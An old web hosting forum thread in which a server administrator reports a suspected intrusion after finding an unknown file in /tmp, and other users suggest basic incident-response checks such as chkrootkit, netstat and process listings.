Hacked - help please

**Tagor** · 06-21-2004 08:11 AM

Yesterday night I received a message that my server was down for about one hour. Because we have had several attacks before we have secured our server. However the security seems to be not 100% secure. We have installed a firewall (APF) that has ddos protection and filters some ip addresses using dshield. I also secured the /tmp folder using scripts/securetmp. However I found a file in the /tmp folder called KDE.

(1) is there a way to check if this script was runned in /tmp?
(2) is there a way to see what happened before the server went down?
(3) are there any logs about who gained access to /tmp?
(4) is there a way to find out who uploaded that file?
(5) is there a way to search in the .php files in /home/ for uploaders who may have uploaded the file?
(6) is there a way to check if someone can execute files as nobody in the /tmp folder? (does anyone have a simple program to check this?)

Below I will post the file that was uploaded and the traffic stats of my server.

Many thanks in advance for helping me!!

**Tagor** · 06-21-2004 08:12 AM

And here are the traffic stats.

**Tagor** · 06-21-2004 08:14 AM

I just found this in WHM:

nobody 0.03 0.08 0.0
Top Process %CPU 2.0 proftpd: connected: localhost (127.0.0.1:38243)

It doesn't say anything for me, but maybe someone know what this does?

**ramprage** · 06-21-2004 09:12 AM

The first thing you need to ensure is that you weren't compromised and that the hacker still doesn't have access.

Check all running processes, run chkrootkit and do a port scan on your server.

netstat -an
ps -aux

Then go through and start looking at your log files and find which user account the file came through from.
You might want to look for something such as wget or even the filename itself.

If you're not feeling good about this then hire someone else to take a look as well. A second opinion and eyes can never hurt.

**Tagor** · 06-21-2004 09:32 AM

First, thanks a lot, ramprage!

I already ran chkrootkit and it didn't find anything except bindshell (but that is normal if you have cPanel installed).

I removed the kde file from /tmp so the person cannot start it again.

Would you mind answering the 6 questions above so I can find out some more information?

Here are some thinks I have some doubt about:

tcp 0 0 0.0.0.0:2084 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN

There are several connections from the IP 0.0.0.0 on several ports, what do they mean?

The other messages seem to be ok, since they are all TCP on port 80.

Also there is some strange traffic on UDP on port 53. 0.0.0.0 is connected to several ip addresses of the server which we actually don't use. Could you tell me who the user 0.0.0.0 is?

On that other command all looks also good. Except I am not sure if this is ok:

USERNAME-OF-A-CLIENT 1673 0.0 0.1 8528 752 ? S Jun20 0:00 cpaneld - serving 217.120.4

I really appreciate your help and I have also often used your great web site

.

**Tagor** · 06-22-2004 02:22 PM

Kick

**netwrkr** · 06-24-2004 10:24 AM

Originally posted by Tagor
Kick

Any chance of you researching your questions rather than have someone spoon feed you the answers?

Give a man a fish and he will eat for a day; teach a man to fish and he will have food for life.

LinkBack

Thread Tools

Hacked - help please

Have I been hacked?

Did I just get hacked?

hacked need help

Getting hacked!

Hacked Help Me Please =*(